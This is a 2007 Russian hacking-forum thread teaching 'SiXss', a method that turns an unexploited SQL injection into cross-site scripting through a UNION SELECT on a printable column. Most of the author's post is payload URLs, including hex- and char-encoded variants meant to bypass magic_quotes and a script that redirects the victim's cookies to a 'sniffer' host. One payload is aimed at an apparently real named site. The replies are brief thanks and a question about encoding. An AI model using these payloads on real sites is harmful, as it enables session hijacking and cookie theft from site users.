SiXss

Тема в разделе "Статьи", создана пользователем Constantine, 18 окт 2007.

  1. Constantine
    Constantine Guest
    INTRO
    Полезность этого вида атак всегда ставилась под сомнение, но все-же: представьте ситуацию: вы нашли sql injection, но раскрутить не смогли, таблы не подбираються, load_file() не работает. Но на сайте есть форум, или идет авторизация через cookie, но xss вы найти не можете, и тут вы вспоминаете про неудавшуюся Sql иньекцию!
    SiXss это метод совмещающий sql иньекцию и xss, то есть через принтабельный столбец вы выполняете определенный яваскрипт код

    Main
    Итак у вас есть стандартная sql иньекция, которую по каким то причинам вы не раскрутили

    Код:
    http://site.com/index.php?id=1+union+select+1,2,3,4,5/*
    где 3 - принтаблеьный столбец

    Дальше у нас есть 2 случая:
    1)Magic_quotes - OFF
    Внедряем в притабельный столбец xss вектор
    Код:
    http://site.com/index.php?id=1+union+select+1,2,'<script>alert('xss');</script>',4,5/*
    Если код выполнился в браузере составляем необходимый нам xss вектор

    Код:
    http://site.com/index.php?id=1+union+select+1,2,'<script>document.location="снифер"+document.cookie;</script>',4,5/*
    Подробнее о возможностях xss можно прочитать здесь - https://xaker.name/forvb/showthread.php?t=5386

    2)Magic_quotes = ON


    Тут так же может быть 2 варианта, либо мы кодируем содержимое в char либо в 0x Sql hex

    Sql hex
    Код:
    http://site.com/index.php?id=1+union+select+1,2,0x3c7363726970743e616c657274282778737327293b3c2f7363726970743e,4,5/*
    В данном случае мы закодировали <script>alert('xss');</script>

    char

    Аналогично
    Код:
    http://site.com/index.php?id=1+union+select+1,2,char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,92,39,120,115,115,92,39,41,59,60,47,115,99,114,105,112,116,62),4,5/*
    END
    Используеться редко, натужно, но иногда, да и вообще для общего развития необходимо знать.
    Пример:
    PHP:
    http://www.4job.ru/?pg_id=-1+union+select+0x3c7363726970743e616c657274282778737327293c2f7363726970743e/*
    Constantine() специально для xaker.name
     
    Последнее редактирование модератором: 18 окт 2007
    18 окт 2007
    4 пользователям это понравилось.
  2. Anvil
    Anvil Guest
    Всё ГУД. И у меня вопросик, наверно немного не в тему.
    Как из <script>alert('xss');</script> зделать
    0x3c7363726970743e616c657274282778737327293b3c2f7363726970743e
    и
    0,115,99,114,105,112,116,62,97,108,101,114,116,40,92,39,120,115,115,92,39,41,59,60,47,115,99,114,105,112,116,62
    Насчёт последнего, я знаю что это за цифирки, но не знаю как их так перегнать массово, а не поштучно.
     
    18 окт 2007
  3. Constantine
    Constantine Guest
    18 окт 2007
  4. Хел
    Хел Guest
    Anvil,
    юзай любой хекс редактор или хекс табилцу...
     
    19 окт 2007
  5. Anvil
    Anvil Guest
    Helkern,
    Constantine,
    Пасиба. Разобрался.
     
    20 окт 2007
  6. baltazar
    baltazar Guest
    зачетная статья +1)сам себе не верю кому я ставлю ыыы
     
    20 окт 2007
Загрузка...